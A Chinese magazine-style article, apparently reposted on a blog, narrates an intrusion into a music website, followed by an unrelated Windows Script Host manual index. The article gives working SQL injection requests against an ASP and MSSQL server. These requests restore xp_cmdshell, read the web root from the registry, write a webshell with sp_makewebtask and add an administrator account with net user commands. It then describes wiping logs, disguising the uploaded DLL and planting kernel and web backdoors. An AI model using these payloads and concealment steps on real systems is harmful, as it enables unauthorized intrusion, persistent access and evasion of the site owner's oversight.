利用纯脚本技术获得系统权限

难易程度:中级
适合对象:脚本技术爱好者
前置知识:SQL注入基本知识
wtf:这个文章小编今天来“客串”一下本版编辑,因为好友“臭要饭的!”给我此文的时候一再叮嘱内容的重要性和轰动性,所以这次委屈脚本小子了,呵呵。闲话少说,这绝对是一篇真实的安全测试文章,也是极具观赏性的。文中在某些问题上可能走了弯路,但是那是为了给大家讲解一个思路,所以关键的解决问题的思路才是最值得大家学习的。本文作者对脚本注入漏洞的深入了解,也有对入侵的新思维分析。如果你对脚本安全兴趣浓厚但难有机会真枪实战,能错过这篇文章吗?
如果说以往的脚本攻击都只停留在web层次的话,这次的文章是深入到了系统层了,因为SQL最迷人的地方在于它强大的功能,而其中很多不为人知的地方又是最迷人的!本文很多技术绝对是第一次出现!来吧!神秘的面纱将慢慢揭开!
划时代的脚本攻击
——利用纯脚本技术获得系统权限
文/图  臭要饭的
目前网上很流行SQL INJECTION 漏洞,也就是我们通常所说的SQL注入漏洞,我们利用这类漏洞可以跨表、跨库查询数据库信息,以及通过论坛来上传文件从而得到主机WebShell(这些都是一些很通常的手法,黑防原来也介绍得比较详细)。
前段时间我对一大型音乐收费网站进行安全测试,结果我利用纯脚本技术,拿到了系统管理员权限。所以,今天我就为大家介绍一下全部经过和我的具体思路分析。

一.踩点
踩点,是对一个服务器进行安全测试的首要工作。我们对服务器先进行端口扫描。我拿出了朋友写的一款非常不错的扫描程序,速度相当快,可以同时开2000个线程!(wtf:GOOD!)半支烟功夫,端口1-65535就扫完了。
扫描的开放端口如下:
21,80,1433,3389
再次扫描得到的结果相同,几乎能肯定是这些了。冲击波过后,网络上的服务器安全了许多,利用系统漏洞入侵也变得有难度了。先来分析了一下:我把目标集中在21和1433端口。现在只有看看运气,看是否能扫出个弱口令(wtf:呵呵,想得倒挺美!)——真是倒霉,我很久都没有扫到存在弱口今的机子了,今天也一样,什么都没扫出来。看来,我只有从网站脚本上寻找出路了。

二.对网站进行全方面的探索
开了1433端口,即SQLSERVER服务,一般网站都是ASP+MSSQL结构来架设的,并且ASP脚本的注入漏洞比其他脚本漏洞好找,漏洞存在的机率也相对要大得多。一般情况下,我在提交的参数后加上单引号提交,如果参数没有过滤,IE一般都会返回错误信息。
我很快找到了一个没有经过任何过滤的参数。
提交:http://www.something.com/script.asp?id=2'
IE返回:


提交:http://www.something.com/script.asp?id=2 and 1=1
IE返回正常记录。
提交:http://www.something.com/script.asp?id=2 and 1=2
IE没有返回记录。
好了,这样就确定存在注入漏洞了,下面我们来利用这个漏洞拿到服务器和数据库的一些相关信息。譬如:想看服务器打的补丁情况,我们提交:
http://www.something.com/script.asp?id=2 and 1=(select @@VERSION)
出错了,呵呵,IE给我们返回错误信息如图1所示:

图1
看来服务器打了SP4补丁,“据说”打了SP4后,也有对80的溢出程序和对MSSQL SP3的溢出程序。不过这些属于“绝对机密”,估计除了wtf那小子有,很少人能搞到,反正我是没有的,那天敲诈他去!现在我们继续!
这台服务器从系统方面对于我们来讲,是比较安全的,所以我还是接着从脚本方面着手吧。再来看看他的数据库连接账号的权限,提交:
http://www.something.com/script.asp?id=2 and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))
返回正常,这证明当前连接的账号是服务器角色sysadmin权限。
wtf:IS_SRVROLEMEMBER('role' [,'login'])函数用于判断当前的用户登录是否是指定的服务器角色的成员。其中,role为被检查的服务器角色的名称。而login是可选的,如果未指定,那么使用当前用户的登陆账号。如果login是role的成员,则返回1,不是则返回0,如果role或login无效,则返回NULL。
我差点没把嘴里的一口茶喷到电脑屏幕上。当前连接账号的服务器角色居然是sysadmin权限!如图2所示:

图2
哈哈!看来连接账号多半是采用SA账号连接的了。
提交:
http://www.something.com/script.asp?id=2 and 'sa'=(SELECT System_user)
用来查看连接账号是不是用sa 连接的,IE再一次返回正常。这证明了连接账号真的是SA,看来权限是至高无上的了。
wtf:当使用应用程序角色时,执行 SELECT USER 将返回当前使用的应用程序角色的名称。如果要获得已登录用户的身份,则使用Transact-SQL 语句:SELECT SYSTEM_USER。
到这里,可能很多人就想到了利用xp_cmdshell扩展存储过程来加系统账号,然后再使用终端连接服务器。这是非常不错的想法!我也是很多人中的一员!我们来试试看行不行吧!

三.利用MSSQL存储过程,得到WebShell
下面,让我们看看xp_cmdshell是否被管理员删除了!提交:
http://www.something.com/script.asp?id=2 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')
IE 返回的信息如下:


看来,xp_cmdshell已经被删除了。呵呵,我们来给他恢复一下吧!
http://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'
再试,看xp_cmdshell是不是恢复过来了?
http://www.something.com/script.asp?id=2 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')
wtf:小编在后来的尝试中,发现xp_cmdshell恢复过来了?哈哈,不知道是哪位兄弟留下来的战果?
同样没有返回内容。这证明,管理员把xplog70.dll这个动态链接库给改名了。要不给删除了,看来直接恢复是没有办法的了。对此,我只能说两个字“我忍”!
这么好个漏洞,不好好利用我是不甘心的,再说都到这地步了,正有劲呢。先拿他的WebShell再说,哼哼,拿到WebShell后,我自然有办法对付他了,哈哈哈…(星仔般的奸笑!)。
下面看如何拿到WebShell!
看过N.E.V.E.R和CZY的文章没有?拿WebShell的方法,两位都已经详细的介绍过了。我也把他们的方法写成了程序,方便我使用,不过很困难的是得不到Web绝对路径。那我们生成的木马保存在什么地方呢?
这可能是很多牛人一直在研究的问题。还好,我对MSSQL还是了解一点。我有办法得到他的Web绝对路径,跟我来吧。(wtf:这绝对是个非常非常大的闪光点!大家看清楚了!)
下面我们要利用到两个MSSQL存储过程。不过有必要先给大家介绍一下xp_regread 扩展存储过程和sp_makewebtask Web 助手存储过程:xp_regread是用来读取注册表信息的,我们通过这个存储过程来得到保存在注册表中Web绝对路径。
sp_makewebtask在我们这里是用来得到WebShell的,其主要功能就是导出数据库中表的记录为文件,文件名你可以自己指定。当然我们这里就指定为ASP脚本文件啦!试想,如果表中记录保存的是脚本代码,导出来的文件也就是脚本文件了。所以,我们添加的记录就是脚本代码。
这里我就不用N.E.V.E.R的方法了。他的方法是导出库文件,导出的文件都比较大,并且很多乱码看起来不方便,如果记录中存在ASP的标记符并且有错误的ASP代码那就不好办了,打开多半返回500的错误码,所以我们采用CZY的方法,就是Web作业来得到Shell。

1.怎么拿到Web绝对路径?
呵呵?这个问题,花了我很长时间去研究。大家都知道MS的东西很多都放在注册表中的,Web位置我们可以在注册表中得到,位置如下:
HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Services/W3SVC/Parameters/Virtual Roots
利用扩展存储过程xp_regread我们可以取得它的值.
EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE',
'SYSTEM/ControlSet001/Services/W3SVC/Parameters/Virtual Roots', '/'
这样,就取出来了,但问题又来了,取是取出来了,我们怎么在IE中返回它的值呢?我的方法是:先创建一个临时表,表中加一字段,类型为:char 255。呵呵,用它来保存Web绝对路径的值。表建好后,我们就用读取注册表的方法,把返回的值保存在一变量中。然后向新建的表中加入记录(即变量的值)。这样,路径就写入到了表中。提交:
DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE',
'SYSTEM/ControlSet001/Services/W3SVC/Parameters/Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--
然后,我们再提交: 1=(select count(*) from 临时表 where 临时字段名>1)
这样IE报错,就把刚才插进去的Web路径的值报出来了。我也试过直接用变量来报错,让IE返回变量的值,结果是失败的,所以就想到了建临时表加数据进去的方法!最后我们再删除刚建的临时表。WebShell就得到了,工作就此告一段落。

2.怎么拿到WebShell?
CZY的文章已经写得很详细了。所以,我这里就只简单的提一下吧! 先创建一个表,建一字段,然后向这个字段中加入木马的内容。然后,把内容通过xp_makewebtask存储过程导出成ASP脚本保存在Web绝对路径中。再次删除建的临时表,一切OVER。如:
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径/导出的文件名.asp',
@query = 'SELECT 你的字段 FROM 你建的临时表'
呵呵,结果就出来了。当然我都写成了程序,所以就不用麻烦自己手工一行一行的加数据进去了(wtf:本期文章有详细介绍!大家一定不会失望!)。方法和思路都写了,现在我们就来行动吧。
还是先看看,他这两个扩展存储过程是不是已经被删除了。如果被删了,我也不想活了!呵呵,提交:
http://www.something.com/script.asp?id=2 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_regread')
再提交:
http://www.something.com/script.asp?id=2 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_makewebtask')
啦啦啦!今天是什么日子,我比过年还开心啦。全部返回正常!两个要用到的存储过程都没有删除。
wtf注:一般管理员也不会删除这两个,可能对它们的了解比较少,也就不会注意它们嘛!危机就在这里面!嘿嘿。
好,拿到Web绝对路径后。继续建表:
http://www.something.com/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][char](255));
这样我们就成功地建了一个名为cyfd的表,并且添加了类型是char,长度为255的字段名gyfd。然后向表中加数据:
http://www.something.com/script.asp?id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/ControlSet001/Services/W3SVC/Parameters/Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--
从注册表中读出Web绝对路径,再把路径插入到刚建的表中。然后报出WebShell的绝对路径:
http://www.something.com/script.asp?id=2 and 1=(select count(*) from cyfd where gyfd > 1)
出错后,IE返回错误,我们得到Web绝对路径“d:/Inetpub/wwwroot”!经过努力的成功特别香甜!喝口茶!如图3

图3
然后删除刚才建的表,提交:
http://www.something.com/script.asp?id=2;drop table cyfd;--
OK,有了路径下面就好办多了。打开我写的获取WebShell的程序,输入漏洞URL:http://www.yfd.com/yfd.com?id=2
输入保存木马的绝对路径:d:/Inetpub/wwwroot。
木马我早就配置好了,代码精简了又精简,只有30行代码,这样才少向服务器提交数据。加快速度嘛!木马的主要功能,就是输入内容,把输入的内容保存为一个文件。呵呵,通过这样的木马,我们就可以实现上传一些功能强大的脚本木马了,如海洋木马。
一分钟不到。程序都已经运行完毕。输入相应的路径,娃哈哈(wtf:要饭的兄弟挺喜欢这个“饮品”?哈哈!),WebShell来了,最快的速度生成了一个海洋木马,如图4,图5:

图4

图5
我生活在幸福之中!——wtf常常说这句话,今天看来我也被感染了!下面我们还得来!

四.恢复xp_cmdshell,向系统权限进军!
下面的工作就是很简单,很轻松了。10分钟不到,就给你一个管理员账号,都说了xp_cmdshell已经被删除了。并且无法恢复,这多半是管理员把xplog70.dll文件给删除,要不改名了。没事,我们上传一个xplog70.dll就搞定一切了,通过WebShell。我很快就把xplog70.dll文件给他上传到e:/inetpub/wwwroot目录下了,来吧,我们来给他恢复,提交:
http://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc ‘xp_cmdshell’, 'e:/inetpub/wwwroot/xplog70.dll'
恢复,支持绝对路径的恢复哦。:)如图6

图6
OK。我们用IE来查看一下是不是已经恢复了。提交:
http://www.something.com/script.asp?id=2 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')
嘿嘿。返回正常。已经恢复了,下面的还用我说吗?呵呵!加账号:
http://www.something.com/script.asp?id=2;exec master.dbo.xp_cmdshell 'net user chouyfd chouyfd1314yf /add'
提升自己为超级管理员
http://www.something.com/script.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators chouyfd /add'
完毕。打开你的终端连接程序,连接吧!哈哈,终于给我连上了。到此我就成功的拿到了这台主机的系统管理员账号。如图7:

图7
下面的工作就是清除日志和留下超级后门,闪人!

五.事后处理工作
终端连接上后,以最快的速度,清除IIS日志,和MSSQL日志。
同时,把xp_cmdshell也给他删除掉,不要让他发现了,也就不好办了。再把我上传的那个xplog70.dll移动到system32目录下,改个我都不知道什么意思的名字叫:msxlog32.dll(打死他也查不出来,哈哈!)再将猪蛋儿提供的超级内核后门程序安装起,再把存在漏洞的脚本文件给打上补丁。同时在他的那个脚本程序中,我修改了代码,提交特定的参数(POST提示方式),显示我的Web后门程序! 这样两个后门,很保险!怕什么呢?刚过年,真开心啊!

后记:文章可能有很多地方大家不太明白,篇幅有限,如有必要,直接和我交流吧!:dy-e@163.net,这次完全通过脚本技术拿到系统管理员账号。这也是我很久以来对MSSQL深入学习的结果。本文章主要在于展现入侵的思路,入侵方法是多种多样的,希望本文思路对大家有所帮助,祝大家猴年快乐,万事如意!



Windows 脚本技术参考手册(CHM)目录:Windows 脚本技术 Windows 脚本技术 JScript VBScript 脚本运行时 Dictionary 对象 FileSystemObject 对象 脚本 Encoder 使用脚本 Encoder 脚本 Encoder 语法 脚本编码示例 Windows 脚本宿主 入门 WSH 5.6 的新增功能 将 Windows 脚本宿主升级 文档约定 WSH 版本信息 Windows 脚本宿主基础 什么是 WSH? 脚本和 Windows 自动化 脚本文件的类型 宿主环境和脚本引擎 创建可由 WSH 使用的脚本脚本分成可重复利用的部分 Windows 脚本宿主对象模型 运行脚本 使用 Windows 脚本文件 (.wsf) WSH 拖放支持 设置和自定义脚本属性 (.wsh) 在命令提示符下运行脚本 从 Windows 运行脚本 WScript.exe 和 CScript.exe 选项 运行脚本需要包括的内容 设置远程 WSH Windows 脚本宿主的基本任务 访问网络 访问网络连接 控制网络打印机 创建自动登录脚本 驱动应用程序 执行文件管理操作 复制文件和文件夹 映射到特殊文件夹 管理快捷方式 复制快捷方式 创建快捷方式 删除快捷方式 移动快捷方式 操纵系统注册表 远程运行脚本脚本进行签名 WSH 和 Windows 管理规范 (WMI) WSH 演练 WSH 网络管理员示例脚本 安全和 Windows 脚本宿主 CryptoAPI 工具 对脚本进行签名 软件限制策略 签名验证策略 验证脚本 参考 XML 元素 <?job?> 元素 <?XML?> 元素 <description> 元素 <example> 元素 <job> 元素 <named> 元素 <object> 元素 <package> 元素 <reference> 元素 <resource> 元素 <runtime> 元素 <script> 元素 <unnamed> 元素 <usage> 元素 对象 Scripting.Signer 对象 Scripting.Signer 对象的方法 WScript 对象 WScript 对象的属性和方法 WshArguments 对象 WshArguments 对象的属性和方法 WshController 对象 WshController 对象的方法 WshEnvironment 对象 WshEnvironment 对象的属性和方法 WshNamed 对象 WshNamed 对象的属性和方法 WshNetwork 对象 WshNetwork 对象的属性和方法 WshRemote 对象 WshRemote 对象的属性、方法和事件 WshRemoteError 对象 WshRemoteError 对象的属性 WshScriptExec 对象 WshScriptExec 对象的属性和方法 WshShell 对象 WshShell 对象的属性和方法 WshShortcut 对象 WshShortcut 对象的属性和方法 WshSpecialFolders 对象 WshSpecialFolders 对象的属性和方法 WshUnnamed 对象 WshUnnamed 对象的属性和方法 WshUrlShortcut 对象 WshUrlShortcut 对象的属性和方法 属性 Arguments 属性(Shortcut 对象) Arguments 属性(WScript 对象) AtEndOfLine 属性 AtEndOfStream 属性 BuildVersion 属性 Character 属性 Column 属性 ComputerName 属性 CurrentDirectory 属性 Description 属性 Description 属性 (WshRemoteError) Environment 属性 Error 属性 (WshRemote) ExitCode 属性 FullName 属性(WScript 对象) FullName 属性(WshShortcut 对象) FullName 属性(WshUrlShortcut 对象) Hotkey 属性 IconLocation 属性 Interactive 属性 Item 属性 Item 属性 (WshNamed) Item 属性 (WshUnnamed) length 属性(WshArguments 对象) length 属性(WshEnvironment 对象) length 属性(WshSpecialFolders 对象) Line 属性 (WScript) Line 属性 (WshRemoteError) Name 属性(WScript 对象) Named 属性 Number 属性 Path 属性 ProcessID 属性 RelativePath 属性 ScriptFullName 属性 ScriptName 属性 Source 属性 SourceText 属性 SpecialFolders 属性 Status 属性 (WshRemote) Status 属性 (WshScriptExec) StdErr 属性 (WScript) StdErr 属性 (WshScriptExec) StdIn 属性 (WScript) StdIn 属性 (WshScriptExec) StdOut 属性 (WScript) StdOut 属性 (WshScriptExec) TargetPath 属性 Unnamed 属性 UserDomain 属性 UserName 属性 Version 属性 WindowStyle 属性 WorkingDirectory 属性 方法 AddPrinterConnection 方法 AddWindowsPrinterConnection 方法 AppActivate 方法 Close 方法 ConnectObject 方法 Count 方法 CreateObject 方法 CreateScript 方法 CreateShortcut 方法 DisconnectObject 方法 Echo 方法 EnumNetworkDrives 方法 EnumPrinterConnections 方法 Exec 方法 Execute 方法 Exists 方法 ExpandEnvironmentStrings 方法 GetObject 方法 getResource 方法 LogEvent 方法 MapNetworkDrive 方法 Popup 方法 Quit 方法 Read 方法 ReadAll 方法 ReadLine 方法 RegDelete 方法 RegRead 方法 RegWrite 方法 Remove 方法 RemoveNetworkDrive 方法 RemovePrinterConnection 方法 Run 方法 Save 方法 SendKeys 方法 SetDefaultPrinter 方法 ShowUsage 方法 Sign 方法 SignFile 方法 Skip 方法 SkipLine 方法 Sleep 方法 Terminate 方法 (WshScriptExec) Verify 方法 VerifyFile 方法 Write 方法 WriteBlankLines 方法 WriteLine 方法 事件 End 事件 Error 事件 Start 事件 错误信息 //H 选项需要宿主名称。 //T 选项需要超时值。 已命名元素或未命名元素有重复的名称。 尝试用 //S 选项保存设置失败。 无法执行 — 参数列表太长。 无法写入 wsh.log。请向您的管理员咨询。 无法更改默认脚本宿主 找不到脚本脚本引擎 找不到脚本文件 <script file name>。 无法从 stdin 中读取脚本。 无法保存设置。 命令行选项不匹配。 无法连接对象 <object name>。 无法定位自动化类名称 <automation class name>。 //E 选项需要脚本引擎的名称。 无法移除环境变量 <name>。 Windows 脚本宿主的执行失败。 //H 选项的宿主名称必须是 Windows 脚本宿主初始化失败。 不提供命令而调用 Exec 的尝试无效。 路径名称无效。 快捷方式路径名必须以 .lnk 或 .url 结尾。 //T 选项的超时值无效。 加载脚本 <script name> 失败。 加载设置失败。 缺少作业名称。 没有名为 <name> 的打印机。 找不到 <name> 的协议处理程序。 供读取的注册表项 <name> 中的根无效。 无法打开注册表项 <name> 供读取。 无法移除注册表项 <name>。 远程脚本对象只能执行一次。 脚本 <script name> 上的脚本执行时间超时。<script name> 的执行被终止。 脚本设置文件 <settings filename> 无效。 URL <name> 中的语法无效。 无法保存快捷方式 <name>。 无法将快捷方式目标设为 <name>。 <file name> 中没有文件扩展名。 没有文件扩展名 <file extension> 的脚本引擎。 未指定脚本文件。 无法运行远程脚本。 找不到作业 <job identifier>。 无法等待进程。 该平台不支持 Unicode。 指定了未知选项 <option designation>。 该计算机上的 Windows 脚本宿主访问被禁用。要获得详细信息,请与您的系统管理员联系。 Windows 脚本部件 脚本部件指南 脚本部件概述 Windows 脚本部件简介 脚本部件是如何运作的 创建脚本部件 脚本部件文件的内容 使用脚本部件向导 创建注册信息 说明方法 说明属性 说明事件 创建脚本部件类型库 引用其他部件 引用同一个程序包中的其他脚本部件 检查脚本部件文件中的错误 脚本部件文件和 XML 一致性 使用脚本部件 注册脚本部件 在应用程序中使用脚本部件 在宿主应用程序中处理脚本部件的事件 实现 ASP 脚本部件 实现 DHTML Behavior 脚本部件 创建 Behavior 脚本部件 在 Behavior 脚本部件中说明属性和方法 在 Behavior 脚本部件中说明自定义事件 脚本部件参考 <?component?> <?XML ?> <comment> 元素 createComponent 函数 <event> 元素 fireEvent 方法 getResource 函数 <implements> 元素 <method> 元素 <object> 元素 <package> 元素 <property> 元素 <public> 元素 <reference> 元素 <registration> 元素 <resource> 元素 <script> 元素 <component> 元素 Behavior 处理程序参考 <attach> 元素 attachNotification 方法 createEventObject 方法 element 属性 <layout> 元素 fireEvent 方法 Windows 脚本接口 SDK(英文) Introduction Windows Script Hosts Windows Script Engines Reference IActiveScript Interface IActiveScript::AddNamedItem IActiveScript::AddTypeLib IActiveScript::Clone IActiveScript::Close IActiveScript::GetCurrentScriptThreadID IActiveScript::GetScriptDispatch IActiveScript::GetScriptSite IActiveScript::GetScriptState IActiveScript::GetScriptThreadID IActiveScript::GetScriptThreadState. IActiveScript::InterruptScriptThread IActiveScript::SetScriptSite IActiveScript::SetScriptState IActiveScriptError Interface IActiveScriptError::GetExceptionInfo IActiveScriptError::GetSourceLineText IActiveScriptError::GetSourcePosition IActiveScriptParse Interface IActiveScriptParse::AddScriptlet IActiveScriptParse::InitNew IActiveScriptParse::ParseScriptText IActiveScriptSite Interface IActiveScriptSite::GetDocVersionString IActiveScriptSite::GetItemInfo IActiveScriptSite::GetLCID IActiveScriptSite::OnEnterScript IActiveScriptSite::OnLeaveScript IActiveScriptSite::OnScriptError IActiveScriptSite::OnScriptTerminate IActiveScriptSite::OnStateChange IActiveScriptSiteWindow Interface IActiveScriptSiteWindow::EnableModeless IActiveScriptSiteWindow::GetWindow IActiveScript Enumerations SCRIPTSTATE SCRIPTTHREADSTATE IDispatchEx Interface IDispatchEx Methods IDispatchEx::DeleteMemberByDispID IDispatchEx::DeleteMemberByName IDispatchEx::GetDispID IDispatchEx::GetMemberName IDispatchEx::GetMemberProperties IDispatchEx::GetNameSpaceParent IDispatchEx::GetNextDispID IDispatchEx::InvokeEx
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值